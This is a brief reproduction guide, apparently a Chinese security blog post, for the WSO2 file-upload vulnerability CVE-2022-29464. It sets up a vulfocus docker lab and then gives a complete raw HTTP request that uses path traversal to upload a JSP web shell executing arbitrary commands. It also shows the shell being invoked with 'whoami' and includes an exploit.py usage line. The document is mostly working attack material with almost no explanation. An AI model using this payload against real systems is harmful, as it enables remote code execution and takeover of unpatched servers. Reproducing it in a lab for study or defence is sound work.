CVE-2022-29464 WSO2文件上传漏洞复现

docker pull vulfocus/wso2-cve_2022_29464

docker run -d -it -p 8280:8280 -p 8243:8243 -p 9443:9443 --name cve_2022_29464 vulfocus/wso2-cve_2022_29464

POST /fileupload/toolsAny HTTP/1.1Host: 192.168.159.130:9443User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeContent-Type: multipart/form-data; boundary=4af6f362a86baadf5ec3177278d4911Cookie: session=0cb2ce62-1f82-4c51-8735-229398731d4f.XC9bRwlYo7x31-PjcBFWrJnuG_w; JSESSIONID=C7832D63E80798858C15459A4267966EUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: cross-siteContent-Length: 805
--4af6f362a86baadf5ec3177278d4911Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/cmd.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/cmd.jsp"
<%@ page import="java.io.*" %>    <%    String cmd = request.getParameter("cmd");    String output = "";    if(cmd != null) {        String s = null;        try {            Process p = Runtime.getRuntime().exec(cmd,null,null);            BufferedReader sI = new BufferedReader(newInputStreamReader(p.getInputStream()));            while((s = sI.readLine()) != null) { output += s+"</br>"; }        }  catch(IOException e) {   e.printStackTrace();   }    }%>        <pre><%=output %></pre>--4af6f362a86baadf5ec3177278d4911--

https://192.168.159.130:9443/authenticationendpoint/cmd.jsp?cmd=whoami

https://github.com/hakivvi/CVE-2022-29464

python exploit.py https://ip:9443/ shell.jsp

https://ip:9443//authenticationendpoint/shell.jsp